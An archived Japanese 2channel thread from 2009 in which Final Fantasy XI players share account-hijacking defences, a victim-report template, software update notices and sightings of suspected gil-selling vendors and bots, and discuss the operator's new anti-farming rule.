●●RMT業者の垢ハック報告・監視スレ51●●

このエントリーをはてなブックマークに追加
1既にその名前は使われています
このスレの目的
1:予防と自衛について情報を共有する
2:RMT業者(規約違反者)の動向を監視、通報
3:報告テンプレ(>>3)に基づく垢ハック被害報告の収集(相談する場合必須)
4:相談者へのアドバイス
★URLの鑑定依頼はNGです。

【垢ハック対策】
■基本テンプレに関してはテンプレサイトの「具体的な自衛策」をご覧ください
□テンプレサイト、まとめサイトへのリンクは>>2  <テンプレ2/4>参照

■RMTギル生産業者探しブログ
ttp://blogs○yahoo.co.jp/gilgametal
■スペシャルタスクフォースへの通報はこのフォームから
ttps://secure.playonline.com/support/exmf.html#stt

_・)ゆっくりしていってね!!!(・w

●● RMT業者の垢ハックが多発している件50 ●●
http://dubai.2ch.net/test/read.cgi/ogame/1247974220/
2既にその名前は使われています:2009/08/03(月) 20:38:03 ID:KGLR4aMY
デバックの次はSTTの仕事するのかよ
3既にその名前は使われています:2009/08/03(月) 20:38:30 ID:TaUBeygc
■アカウントハック被害にあったら
     ログイン可能ならGMコールしてアカウントを停止します。
     アカウントの復旧 ゲームデータの復元は「不正アクセス専用チャットサポート」が受付窓口です。
     不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
     受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)

■基本テンプレに関してはテンプレサイトの「具体的な自衛策」をご覧ください
■このスレで紹介される外部リンクを踏むのは、すべて自己責任でお願いします。
□Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください。
□使用ブラウザのスクリプト実行を不許可にすることをお勧めします。

■まとめサイト
ハック対策テンプレ= ttp://sites.google.com/site/ff11security/
FF11Warning= ttp://miku.xrea.jp/(垢ハックについての対策)
     (xreaが不安ならミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/ (初心者さん向け)
【FF11】アカウント不正ログイン被害まとめ=ttp://ort.sakura.ne.jp/taisai/ (スレNo.20以前の過去ログあり)

■対処したアカウント数と凍結ギル額の履歴
http://www.playonline.com/ff11/rule/specialtask.html
4既にその名前は使われています:2009/08/03(月) 20:39:41 ID:TaUBeygc
---------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時、状況)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法:(ワンタイムパストークン使用の有無、未使用の場合、POLに保存の場合セキュリティ設定使用かどうか/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:(Yes/No・Yesの場合はそのツールの説明)
●ネットカフェの利用の有無:(Yes/No)
●使っているOS:(SP等まで書く)
●使用ブラウザ:(バージョン等まで分かれば書く)
●WindowsUpdateの有無:(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン:(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト状況:(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日 気付く前の最終検索日)
●その他のセキュリティ対策:(Spybot S&D、ルータ、ファイアウォール等)
●ウイルススキャン結果:(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか:(Yes/No/今から読みます)
●hosts変更:(有/無/わからない 有の場合、自分やspybotによるものか第三者によるものかどうか)
●PeerGuardian2の導入:(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など:(書ききれない場合は次レスで書いてください)
5既にその名前は使われています:2009/08/03(月) 20:42:07 ID:IeMxo3UI
1乙。50は落ちちゃったな…orz
6既にその名前は使われています:2009/08/03(月) 20:42:24 ID:TaUBeygc
■各種ソフトのアップデート報告(情報提供等)について
スレ内を検索しやすいように各種ソフトのupdate情報には符丁をつけておくことを推奨します。
★FlashPlayerなどAdobe系ソフト、Firefoxなどブラウザ、NoScriptなどアドオンなどの更新があったときには
 ※※各種ソフトウェアアップデート情報※※
★セキュリティホールに関するニュースが出たときには
 ※※セキュリティホール情報※※
を付けてみてください。

■スレ番号が200を越えていたり、出かける/寝る前に200が近いなどの場合は
  age書き込みで保守をお願いします。
  ↓保守用からあげAA(使用不使用はご自由に)

      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <age
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪
7既にその名前は使われています:2009/08/03(月) 20:44:06 ID:TaUBeygc
びっくりだお。今日帰ってチェックしたら、落ちてんだもん。平和だからかねぇ。
守備範囲、FF以外まで広げたら、落ちないかな?
8既にその名前は使われています:2009/08/03(月) 20:46:53 ID:TaUBeygc
まぁ、とりあえず、
Adobe Flash Player for ActiveX
Adobe Flash Player Plugin
の2つは、アンインスコして、Adobeサイトから最新落とすべ。
9既にその名前は使われています:2009/08/03(月) 20:50:17 ID:m6bBjl8v
ちょくちょくギル売ってる人間だけど、
お前らのせいかここ2、3週間ほど、ちょっと値上がり傾向
14発表の6月後に急落していたギルの値段が、
リバウンドしてる
いずれ無価値にはなるし、売るなら今かもね
俺は大口だったし面倒だからRMT掲示板の買取業者にうったわ
10既にその名前は使われています:2009/08/03(月) 20:54:41 ID:lT9VW7UB
どう見ても全角です、スレ立てありがとうございました。
11既にその名前は使われています:2009/08/03(月) 20:55:17 ID:JJnKOY0D
いちおつ。落ちちゃったのねー
>>9
千の風になってください
12既にその名前は使われています:2009/08/03(月) 20:57:17 ID:TaUBeygc
鍛え上げたオフゲのRPGのデータだって、いずれ無価値になるんさ。
ステータス育てる過程たのしめなきゃ、やんないようがいいよ。ネトゲなんざ。
そんなデザインのゲームもね。
漏れにはチャットゲームだよ。FFXIってね。育成・やり込み要素は会話のネタの仕込み。
おもろい会話できるPCと出会えるかどうかなんだよなぁ。
今のネトゲって、ライト層には手だしにくいよね。
セキュリティ問題で、ライト層また、市場から居なくなりそう。
mixi、ついったーとかが、まったりチャットの旬なのかな。
13既にその名前は使われています:2009/08/03(月) 22:20:25 ID:JJnKOY0D
250
14既にその名前は使われています:2009/08/03(月) 22:21:47 ID:a+PMIsDN
ほむ
15既にその名前は使われています:2009/08/03(月) 23:03:11 ID:7OhQA9L7
>>9
嘘だ!ならナンでボクが欲しいインフィブルピアスが値上がりするって証拠だよ;;
16既にその名前は使われています:2009/08/03(月) 23:52:16 ID:9S/0UjHu
このスレ読んでる奴いるの?
17既にその名前は使われています:2009/08/03(月) 23:52:25 ID:LzgjxgdX
さすがに下がるのはえーなw
18既にその名前は使われています:2009/08/04(火) 00:34:56 ID:Hk54BLRw
これ寝て起きたら絶対落ちてるだろ
19既にその名前は使われています:2009/08/04(火) 00:35:13 ID:Mlr8okPB
おやすみage
20既にその名前は使われています:2009/08/04(火) 00:36:14 ID:agCQyURD
時期もあるけど本当に飽きた呆れたが現れ始めたからね〜
21既にその名前は使われています:2009/08/04(火) 00:36:55 ID:l6gWezBN
age
22既にその名前は使われています:2009/08/04(火) 00:46:08 ID:NiWtJ+gs
…いやさ、さすがに字を戻そうぜ。
RMTの字をさ。
字が大きかったから、落ちたのも要因に入るからさ。
俺は建てられないから、誰か頼むな!
23既にその名前は使われています:2009/08/04(火) 00:54:50 ID:stq11FYe
おやすみ
24既にその名前は使われています:2009/08/04(火) 01:39:15 ID:k+2dlzZd
このスレタイは検索しずらいとおもうんだお
立て直してもいいんだけど
乱立させるなとかいわれそうだし、もう寝るお
25既にその名前は使われています:2009/08/04(火) 02:13:16 ID:JxHdkU2I
あと●●とRの間に半角スペースね
26既にその名前は使われています:2009/08/04(火) 03:09:50 ID:uGLP2K6M
RMTでみんな検索してるんだな。俺は垢でいつも探してる。
27既にその名前は使われています:2009/08/04(火) 03:32:22 ID:agkBJHRn
次スレ用スレタイ

●● RMT業者の垢ハック報告・監視スレ52 ●●

とか書いて上げ(まだ86だけど)
28既にその名前は使われています:2009/08/04(火) 03:37:21 ID:agkBJHRn
あ?上げないほうがいいのか?
sage落として新しいの起てたほうがいいか
29既にその名前は使われています:2009/08/04(火) 04:02:53 ID:6IrOWsC1
栽培に関する変更について
http://www.playonline.com/ff11/polnews/news16663.shtml
30既にその名前は使われています:2009/08/04(火) 04:03:43 ID:O2YIW+Zr
栽培に関する変更について
http://www.playonline.com/ff11/polnews/news16663.shtml

2009年に入り、ギルの推移に不審な点が認められたため調査を進めたところ、ギルの現実世界の金品による
売買(RMT)を行っている集団が大量のアカウントを使用して、栽培を行っている実態が明らかになりました。

これらのアカウントについては、記録をさかのぼって大規模に対処を実施済みですが、これから栽培を利用して
RMTを行おうとする集団に対しても抜本的な対策を施すべく、並行して準備を進めてまいりました。

その結果、栽培を行う規約違反行為者に有効な対策であること、および一般ユーザーの皆様への影響を最小限に抑えることに留意して、
作成日から90日を過ぎていないキャラクターは、栽培で得ることのできる収穫量を1に制限いたしました。
この対策は、8月4日(火) 2:00に行われたバージョンアップ以降、有効になっております。

ファイナルファンタジーXIでは、RMTやその他の不正行為について、発見し次第厳しい対処を行うとともに、
すべてのユーザーの皆様が安心してプレイできるよう、より一層の取り締まり強化を行っていく所存です。

今後とも健全な運営を保つため、皆様のご理解とご協力をよろしくお願い申し上げます。
31既にその名前は使われています:2009/08/04(火) 04:19:22 ID:e14wAs9q
今月頭までに投入された栽培マンが生きてる限りはギル引き出しつづける
どうせ連続課金が必要ってことはないんだろうから
NA版に付いてくるおまけレジコで登録だけ済ませて90日放置
何もしていないならBANされるわけないし、もともとタダ
減りそうな気がしませんw

それでも契約減るかもしれないってことで
まさか、きんきゅうボナンザ発売とかないよなw
32既にその名前は使われています:2009/08/04(火) 04:38:58 ID:0E7vSwhm
スレタイ変わったから落ちたのかな
33既にその名前は使われています:2009/08/04(火) 04:45:24 ID:+u/st4hc
勝手に合併されて保守してきた奴らが萎えたんだろ
34既にその名前は使われています:2009/08/04(火) 06:11:58 ID:buma+9rl
>>30
ギルこさえて、売るまでに90日掛かってんのかね。
それとも、90日以内にRMT検知してバンしてんのかね。
まぁ、放置よりは良いわな。
35既にその名前は使われています:2009/08/04(火) 08:22:54 ID:JxHdkU2I
一応ここを使いきるつもりで保守しようか
36既にその名前は使われています:2009/08/04(火) 08:28:37 ID:9L9eSICI
トークンあればほぼ、ハックなんて無いだろ?
37既にその名前は使われています:2009/08/04(火) 08:30:55 ID:agCQyURD
>>33
無茶な、どっちに転んでも維持出来ないよw
38既にその名前は使われています:2009/08/04(火) 09:21:42 ID:UtSLSF3I
>2009年に入り、ギルの推移に不審な点が認められたため調査を進めたところ
業者が大量の垢で栽培してたのは去年からだろ…
ユーザーからの報告も大量にいってただろうに遅すぎるわボケ。

>>36
トークンさえあればFFの垢はまず安全。
でもゲームに限らず他の個人情報が盗まれたり、
BOT化されてサイバー攻撃の踏み台にされたりするのは嫌だろ?
39既にその名前は使われています:2009/08/04(火) 09:21:48 ID:NiWtJ+gs
>>28
次のスレタイ変更済みスレが出来るまでageればいいさ。
無くなるのが一番の驚異、ってか、中華の思う壷だから。

あと、RMTさんこんなスレまで出張ご苦労様です。
精鋭は今別ゲでハック対策頑張ってるけど、たまにこっちにも来てくれるから、
そんな人を向かえる為にもここは残しておく必要が有るんです。
あ、火病らないでね。
40既にその名前は使われています:2009/08/04(火) 10:48:56 ID:YVdAej/r
不正者ガンガン処罰してねAGE
41既にその名前は使われています:2009/08/04(火) 11:54:23 ID:GxbLx3uc
2009年に入り、ギルの推移に不審な点が認められたため調査を進めたところ、ギルの現実世界の金品による
売買(RMT)を行っている集団が大量のアカウントを使用して、栽培を行っている実態が明らかになりました。


なにこの「調査」の遅さ。
みんなで報告してただろ・・・
42既にその名前は使われています:2009/08/04(火) 12:21:05 ID:TgGOWzId
しかも月初めにやるとか、新たに倉庫作った奴だって少なからず存在するだろうに
43既にその名前は使われています:2009/08/04(火) 12:21:36 ID:5n2tF2PF
>>31
いやいや十分効果あると思うよ。今いる栽培業者を通報すればRMTに絡んでいる以上いずれBANされる。
BANされたら今まではフリーで戻ってきたから出費0で痛くなかった。けど今後はNA版のパケ代5j+2ヶ月の課金代16キャラで3000円×2が
出費として上乗せされる。
偽造クレカで課金するからタダって方法も、2ヶ月不明なクレカ決済が行われるわけだから、クレカ会社なり契約者なりが気づいて
警察に通報する可能性も増えるだろう。偽造クレカの不正利用はゲーム内じゃなくリアルでBANのリスクが出てくる。

ようは今いる三国の栽培業者っぽいあやしいキャラを通報しとけばいいって事よ。
それがRMTに絡んでたら業者だろうが何だろうがBANされるんだから。
44既にその名前は使われています:2009/08/04(火) 12:24:49 ID:agCQyURD
調査、ッてのは売り上げ落ちる恐れとコンだけ強制退会処分して良い?
って言うスクエニ内部での会議の事を言ってるんだろうさ。
45既にその名前は使われています:2009/08/04(火) 12:38:43 ID:5n2tF2PF
あ、作成日から90日経過してればいいのなら、その間課金しなくて放置しとけばいいって訳か・・・。
それだと3垢位作成して寝かせておいて、課金するのはその内1垢。BANされたら他の垢で課金して栽培すればいいって事か。
課金月が二ヶ月以上無いと栽培収穫量が落ちる項目も追加してくれないとダメだなこりゃ。
46既にその名前は使われています:2009/08/04(火) 12:41:34 ID:mK3m224h
※※各種ソフトウェアアップデート情報※※

Firefox 3.5.2
47既にその名前は使われています:2009/08/04(火) 13:14:38 ID:2sYN6ck2
Kujata バス

こりない業者がまたシリーズものを作成中
Yuqiua,Yuqiub,Yuqiuc(現在、cを作成中)
48既にその名前は使われています:2009/08/04(火) 14:27:26 ID:oGwQWrUL
課金期間90日にしないと意味無いよな。
49既にその名前は使われています:2009/08/04(火) 14:29:21 ID:g7FrOXir
プレイ時間45日とか
50既にその名前は使われています:2009/08/04(火) 14:37:33 ID:5n2tF2PF
でも最低一か月分の課金は必要な訳か。90日寝かせるにしても、そこから栽培始めるとすると
フリートライアル期間もウェブマネーの無料期間も過ぎてるわけだから、課金しないと始められない。
今までは無料で栽培できてたのが問題だったが確実に一か月分の課金は払わされることになる。
■e的には確実に一か月分の課金は入ってくるようになる。
栽培スレで言われてた無料期間中は栽培不可にしろっていう提案は通った形になったのか。
51既にその名前は使われています:2009/08/04(火) 15:04:42 ID:agCQyURD
一部競売アイテムがチョビット値下がりしたのあるから一応banは本当にあった気がするね。
52既にその名前は使われています:2009/08/04(火) 15:50:27 ID:MjCxFFww
集計期間 対処したアカウント数 凍結ギル額
2009年7月1日〜2009年7月31日 31,630 約27億
http://www.playonline.com/ff11/rule/specialtask.html
53既にその名前は使われています:2009/08/04(火) 16:33:43 ID:stq11FYe
ほする
54既にその名前は使われています:2009/08/04(火) 16:36:10 ID:P3jM2SmD
>>52
前月比2倍の対処数は、栽培業者に大鉈を振るった結果か。
今までどんだけ奴らを野放しにしてたんだよww
55既にその名前は使われています:2009/08/04(火) 16:38:23 ID:2sYN6ck2
栽培スレ、未だに業者がFTでやってたと思いこんでるようなにわかばっかりだな。
56既にその名前は使われています:2009/08/04(火) 18:05:06 ID:1BV3jSLM
239 年齢
57既にその名前は使われています:2009/08/04(火) 18:21:26 ID:g7FrOXir
なーんでこの時間でbろがめ。こmのtellが
58既にその名前は使われています:2009/08/04(火) 18:31:38 ID:1BV3jSLM
まだバンされてない垢、現金化して在庫処分しようと、必死なんじゃない?
59既にその名前は使われています:2009/08/04(火) 18:38:22 ID:noqbMGsX
>>47
修正を知らない業者なんだろ
一週間後に涙目になるから、通報してそっとしておけばよくね?
60既にその名前は使われています:2009/08/04(火) 20:42:30 ID:eBEFRJ9k
270
61既にその名前は使われています:2009/08/04(火) 21:37:10 ID:o3yYPAX6
栽培ついにきたのねあげ
62既にその名前は使われています:2009/08/04(火) 21:41:35 ID:dRAZSh57
稼ぐ手段が無くなって宣伝tellが無くなるか
新たな稼ぎ口を見つけてそのままか

tell対策
63既にその名前は使われています:2009/08/04(火) 23:16:04 ID:Mlr8okPB
おやすみage
64既にその名前は使われています:2009/08/05(水) 00:24:15 ID:4JsMdEyo
229
65既にその名前は使われています:2009/08/05(水) 00:28:31 ID:TmChevDU
昔みたいに鉱石栽培主流になるのかなage

「さかのぼって処分」てのは、買い手にも処分(警告?)きたのかね??

66既にその名前は使われています:2009/08/05(水) 01:18:17 ID:Y1YsU2oV
使ってる人居ないと思うけどMS SilverlightのUpdate来てた
67既にその名前は使われています:2009/08/05(水) 02:21:20 ID:HQ0XKZNv
おやす
68既にその名前は使われています:2009/08/05(水) 02:26:31 ID:wRy83I13
9.1.3にupしてもAcroRd32.exeが最新にならないage
69既にその名前は使われています:2009/08/05(水) 02:40:19 ID:8FK3vzAc
夕方の爆撃はすぐにキャラを消してくれてたっぽいのに
夜になったらコールしても定型文が返ってくるのみで同じキャラからtellきまくるなぁ
Bkjbkjhbkjbijから4回目のtell着信@Caitsith
70既にその名前は使われています:2009/08/05(水) 03:15:51 ID:BNneCcbt
栽培がほぼ潰れた事で、業者の稼ぎはどこから得るんだろうなあ。
ある程度傾向がわかれば通報しやすいんだけど・・・。
71既にその名前は使われています:2009/08/05(水) 04:54:14 ID:jVenBPP7
>>70
シンク・コルセア悪用アスフロ爆上げでお使い系クエ巡りはどうだろう?
セルビナの石碑巡りクエをバタリアソロムグ限定とか。
もちろんFT垢でPTかアラ組んで。移動は小ワープか地下で。
72既にその名前は使われています:2009/08/05(水) 05:33:02 ID:ZAgSNgku
※※各種ソフトウェアアップデート情報※※
Java Runtime Environment (JRE) 6 Update 15
既出だったらごめん
73既にその名前は使われています:2009/08/05(水) 08:50:43 ID:E7vfNH//
栽培の修正入ってから、釣りBOTや地中ワープがまた増えてきてる

注意喚起age
74既にその名前は使われています:2009/08/05(水) 09:41:06 ID:ib+OlTcx
>>72
チェック忘れてた、今更新したわ…ありがとう
あんまり敏くないからこのスレの各種ソフトウェアアップデート情報は毎回助かってる
75既にその名前は使われています:2009/08/05(水) 11:14:29 ID:4JsMdEyo
247
76既にその名前は使われています:2009/08/05(水) 12:10:13 ID:nf773htK
208

>>68
常にexeが最新になるわけじゃない。
9.1.1はAnnots.apiしか更新しないし、9.1.3はauthplay.dll
(AdobeReader内で使われるFlashPlayer)しか更新しない。
77既にその名前は使われています:2009/08/05(水) 12:45:16 ID:4JsMdEyo
こけこー
78既にその名前は使われています:2009/08/05(水) 14:01:11 ID:vV7xxLg6
Adobe ReaderがBAできないんだが?
79既にその名前は使われています:2009/08/05(水) 14:29:22 ID:nf773htK
9.0とかなら9.1を新規インスコ。
9.1なら9.1.2を先に当て、その後9.1.3。
80既にその名前は使われています:2009/08/05(水) 14:42:16 ID:Y1YsU2oV
既出のNoScript1.9.7.9age
81既にその名前は使われています:2009/08/05(水) 14:46:55 ID:n0dADWC7
8.1.6入れてあったノートはBA出来なかった
確認してもBAはありませんだったな
82既にその名前は使われています:2009/08/05(水) 15:24:36 ID:wQ93NFzZ
保守
83既にその名前は使われています:2009/08/05(水) 15:41:33 ID:vC9XOQju
Kujata鯖の西アルテパ砂漠で チョコボの穴掘りをしているTakpyon
同じルートを寸分の狂い無く通っている
ボットの可能性有るから 見かけて怪しいなら 通報お願いします
一応通報しました
84既にその名前は使われています:2009/08/05(水) 16:25:10 ID:zT591nj2
保守
85既にその名前は使われています:2009/08/05(水) 18:08:52 ID:vC9XOQju
保守
86既にその名前は使われています:2009/08/05(水) 19:08:04 ID:vC9XOQju
保守ヌルポ
87既にその名前は使われています:2009/08/05(水) 19:47:31 ID:8UfS8ERB

ガッガッガッガッガッガッ
 ∧_∧ つ ミ
( ´・ω・)つ ミ☆
/ ⊃  ノ つ ☆))Д´)>>86
88既にその名前は使われています:2009/08/05(水) 20:42:16 ID:3odanbDw
age
89既にその名前は使われています:2009/08/05(水) 20:50:48 ID:u2aDRtd7
いつも下層にいるテレポボットがいないな
いよいよ引っ越しかね
90既にその名前は使われています:2009/08/05(水) 20:51:07 ID:3KE76kDq
ファイナルファンタジーXI 更新のお知らせ(8/5)
下記日時におきまして、ファイナルファンタジーXIのバージョンアップを実施いたしました。
※本バージョンアップにより、クライアントプログラムのバージョ
 ンアップが行われます。下記日時以降に「プレイ」ボタンを押す
 と自動的にバージョンアップが開始されますので、画面の指示に
 従って操作を行ってください。


             記

日 時:2009年8月5日(水) 20:00頃
対 象:ファイナルファンタジーXIをご利用のお客様
【主な変更内容】
■北グスタベルグの地形データの不具合が修正されました。

キタ━━━( ´∀`)・ω・) ゚Д゚)・∀・) ̄ー ̄)´_ゝ`)ノД`)・゚・。━━━!!!!!
91既にその名前は使われています:2009/08/05(水) 21:13:43 ID:Yd0tz/Hz
この修正はなに?
92既にその名前は使われています:2009/08/05(水) 22:14:52 ID:4JsMdEyo
★ゅ
93既にその名前は使われています:2009/08/05(水) 22:37:58 ID:3odanbDw
おやすみage
94既にその名前は使われています:2009/08/05(水) 23:03:37 ID:N0/y4A8s
2583通のメール便未配達=配達員が自宅に放置−ヤマト運輸
http://headlines.yahoo.co.jp/hl?a=20090805-00000132-jij-bus_all

トークンまぎれてたら怖いな
95既にその名前は使われています:2009/08/05(水) 23:04:56 ID:4JsMdEyo
メール便は佐川じゃなかったっけ
96既にその名前は使われています:2009/08/05(水) 23:16:27 ID:nf773htK
>>90
いまさら北グスタって…一体何が…
97既にその名前は使われています:2009/08/06(木) 00:06:52 ID:6DOWwg7q
最近業者テルしてくる業者二つくらい増えてない?
夜間だと半端内スパンでテルくる
98既にその名前は使われています:2009/08/06(木) 00:13:40 ID:dsDSt5oA
bろがめ。こm
bろさぇ。こm
pcがめるさ。こm
おがめぼy。こm
他にもおがめ何たらがあったきもする
99既にその名前は使われています:2009/08/06(木) 01:10:54 ID:/EIyWnTh
ogameはネ実じゃね
100既にその名前は使われています:2009/08/06(木) 01:31:46 ID:PdoxMVqH
Kujataでは業者tellが減った気がする。すくなくともここ数日は飛んできてない。
ただ業者っぽいのは相変わらずキャラを作ってたりする。
今日もUouououoa〜Uouououop、Yuyuyuyua〜Yuyuyuyupなんてのを延々と
作ってた。
101既にその名前は使われています:2009/08/06(木) 01:32:42 ID:PdoxMVqH
あげ
102既にその名前は使われています:2009/08/06(木) 01:36:27 ID:Nj2QtKt2
>>95
ヤマトで届いたよ
103既にその名前は使われています:2009/08/06(木) 02:03:51 ID:yciu/jE6
トークンの配送は、一回目の販売時が佐川のメール便で、二回目はヤマトのメール便
だったようだね。

いずれにしても未登録トークンは適当な数字を表示するイカしたキーホルダーでしかない
から、不着でも怖いことはないでしょう。再送付手続きをして待たされるユーザーは
たまったもんじゃないけど。

それはさておき、このスレの生存確保が難しくなってきたな。悪いことではないんだけど。
104既にその名前は使われています:2009/08/06(木) 03:49:41 ID:ZIXT4Bf2
Adobe Flash PlayerがBAできにぃ何度やってもエラー
なんぞこれー
105既にその名前は使われています:2009/08/06(木) 03:56:44 ID:Rxjfv1s+
>>104
Adobeのサイトにアンインストーラーがある。場所は検索してね。
一度それを使ってアンインストールしてから入れなおせばうまく行くと思う。
106既にその名前は使われています:2009/08/06(木) 04:15:09 ID:TkgrySED
こんな時間に即レスありがとう
早速やってみたんだが、今度はIE自体がフリーズするようになってもうたー。この書き込みは携帯から打ってるお…
OS:XP ブラウザ:IE8
なーんかポップアップを全部弾いてるっぽい
107既にその名前は使われています:2009/08/06(木) 04:49:16 ID:Rxjfv1s+
>>106
Firefoxからでもオペレーティングシステムまたはブラウザの変更ってとこをクリックして進めば
IE用のインストーラーをダウンロードできるからそれを使ってみたらどうかな。
フリーズとかについてはちょっと情報がないので分からない。すまない。
108既にその名前は使われています:2009/08/06(木) 05:00:38 ID:xXIUKPq5
俺もflashのインストール用のページとか、ヴァージョンチェックのページとかで
IEがCPU100%になったよ。Firefoxでアンインストーラー落としてアンインストール後、
IEのキャッシュ消したりOS再起動してたりしたら、いつの間にか直ってた。
Javascriptを切ったらCPU100%にならなかったから、もしかすると古いjsファイルが
悪さしてたのかも。
109既にその名前は使われています:2009/08/06(木) 06:14:46 ID:i0QRKCPq
Kujata鯖で日本人がインしてる時間帯 夕方から12時くらいまでRMTテル全くなかったが
早朝に倉庫確認にインしたら4回もRMTテルが来た 恐らく客層を外人に絞ってる模様
日本人はすぐ通報するから 宣伝を控えているのかも
110既にその名前は使われています:2009/08/06(木) 06:17:19 ID:i0QRKCPq
あ! ぬるぽ するの忘れてた
111既にその名前は使われています:2009/08/06(木) 06:18:42 ID:dsDSt5oA
ガッしてあげない
112既にその名前は使われています:2009/08/06(木) 06:27:37 ID:i0QRKCPq
          〃  ̄ ̄ ̄ ̄ヽ
         /          ヽ
        |  ●     ● | ンマンマ
         |   ノヽ====, /
          、..  ((.|_|_|_|_|)
           \  ( 。A゚ )
            |  し   J
            |   |   |
           / 〃し ⌒J\
          (  (      )  )
          /  )     (  \
         (_/       \_)

今日も業者を食いまくるぜ!

113既にその名前は使われています:2009/08/06(木) 06:54:09 ID:ZIXT4Bf2
>>107 >>108
firefox落として、とりあえずflashの更新はできたよー
IEのエラーは相変わらずなので、これを機にfirefox使ってみようと思う
ありがとでした!
114既にその名前は使われています:2009/08/06(木) 07:59:35 ID:fCx3aQVA
webにリッチコンテンツは要らないage
115既にその名前は使われています:2009/08/06(木) 08:22:29 ID:fCx3aQVA
ネトゲヤるのに無線でやる奴は居ないだろうけれど
踏み台とか、電子マネーそのものとか色々あるから


無線LANのWPAをわずか数秒から数十秒で突破する
新しい攻撃方法が登場、早期にWPA2に移行する必要あり
ttp://gigazine.net/index.php?/news/comments/20090805_attack_on_wpa/

こうしてみるとハードウェアもウィルス対策ソフト同様
毎年買い換え検討を余儀なくされるかもなー
116既にその名前は使われています:2009/08/06(木) 11:50:51 ID:KIhMf5t4
AEPはどうなんだ
117既にその名前は使われています:2009/08/06(木) 11:51:31 ID:KIhMf5t4
AESだった。
118既にその名前は使われています:2009/08/06(木) 12:26:58 ID:fCx3aQVA
よくわかんな〜い

AES
Advanced Encryption Standard
ttp://www.atmarkit.co.jp/aig/02security/aes.html

AESは、米国標準技術局(NIST)によって進められている
次世代の政府標準暗号の名称である。
119既にその名前は使われています:2009/08/06(木) 14:28:15 ID:4hEvo0IT
保守
120既にその名前は使われています:2009/08/06(木) 14:29:06 ID:4hEvo0IT
sageのままだった
121既にその名前は使われています:2009/08/06(木) 15:00:02 ID:tRSzLabM
>>115
これゲーム機にも影響あるんだよね。
よくてWPAまでしか対応してないし。
無線LAN使っててカード決済にしてる人はこの情報に注意しといたほうがいいかもしれん。
まあ、ゲーム機の場合はメーカーが何らかの対応してくれるだろうが。
122既にその名前は使われています:2009/08/06(木) 15:15:30 ID:1UCqGyjE
無線LAN使ってるならMACアドレスを
フィルターするのが常識だよな?
123既にその名前は使われています:2009/08/06(木) 15:44:23 ID:al7lw3Zc
第三者が無線データを受信して暗号解析して個人情報を盗むってことか
124既にその名前は使われています:2009/08/06(木) 17:20:30 ID:mpW/ANDN
支援上げ
125既にその名前は使われています:2009/08/06(木) 18:27:09 ID:QC83w93M
無線LANはMACアドレスで発信は防げるが、盗聴は防げない。
最近の無線LAN親機では、ゲーム機用のWEPと、PC向けの堅い暗号方式使った無線LANを、それぞれ別に提供する機能を持つ者がある。
買い換えるなら、そんなのを推奨。
まぁ、有線LANの方が安心。
126既にその名前は使われています:2009/08/06(木) 18:56:31 ID:6nxMnA3j
NoScript 1.9.7.9 age
127既にその名前は使われています:2009/08/06(木) 19:57:52 ID:CpOg7UhC
>>126
節子それ結構前からや
128既にその名前は使われています:2009/08/06(木) 20:00:24 ID:mpW/ANDN
夏は落ちやすい時期と諦めるかのう
取りあえず支援上げ
129既にその名前は使われています:2009/08/06(木) 20:57:32 ID:HEKU7PFv
otitiage
130既にその名前は使われています:2009/08/06(木) 20:59:17 ID:AgkDTBZf
出たなズッキーナ
131既にその名前は使われています:2009/08/06(木) 21:37:26 ID:ziBszTDm
TalesWeaverってネトゲが垢ハック祭り中なんだけど
あの板の連中は対策テンプレとか何にも作らずに愚痴るだけwwwwwww
やはりネ実1は格が違った
132既にその名前は使われています:2009/08/06(木) 21:59:19 ID:itwZ3Bsx
ネ実に1付けるとかどこの住人だよ・・・
やっぱりFFから追い出されて業者が楽に稼げる所へ行ったんだな
133既にその名前は使われています:2009/08/06(木) 22:04:42 ID:dsDSt5oA
2や3住人だとまれによく1をつける
134既にその名前は使われています:2009/08/06(木) 22:33:34 ID:ybugt+YV
テイルズは年齢層低そうだからなぁ。
135既にその名前は使われています:2009/08/06(木) 23:19:46 ID:xXIUKPq5
Adobe Flashのインストール時や、バージョンテスト時にIEがフリーズする件ですが、
ぐぐったら解決策が見つかりました。次のどれかを実施するとフリーズしなくなるようです。

(a) http://support.microsoft.com/kb/923737/ja (XP向け)
 ここからリセット用プログラムをDLして実行、ダイアログでは、必ず「個人設定を削除する」をONにすること。
 ※アドオンとか消えますので注意
(b) IEの[表示] - [文字のサイズ] で「最小」を選択
(c) IEのウィンドウサイズを小さくする。

(a) だけで十分ですが、(b)だけでも、もしくは、(c) だけでも問題は回避できます。
136既にその名前は使われています:2009/08/07(金) 00:38:00 ID:ka0e6EZT
上にマイリマス
137既にその名前は使われています:2009/08/07(金) 01:14:45 ID:WFQgUe0F
201からあげ
138既にその名前は使われています:2009/08/07(金) 02:12:47 ID:wRjV30Se
PCつけてるとあついなー
139既にその名前は使われています:2009/08/07(金) 04:19:18 ID:MzBwHDdx
ぶんろがめちゃんPLはじめたそうです
諦めわりぃなw
140汚い忍者KAREI ◆Borr/IL/SA :2009/08/07(金) 06:13:45 ID:PaFWqjay
RMTばれないから大丈夫と行きこんでやってたらこれだよ糞
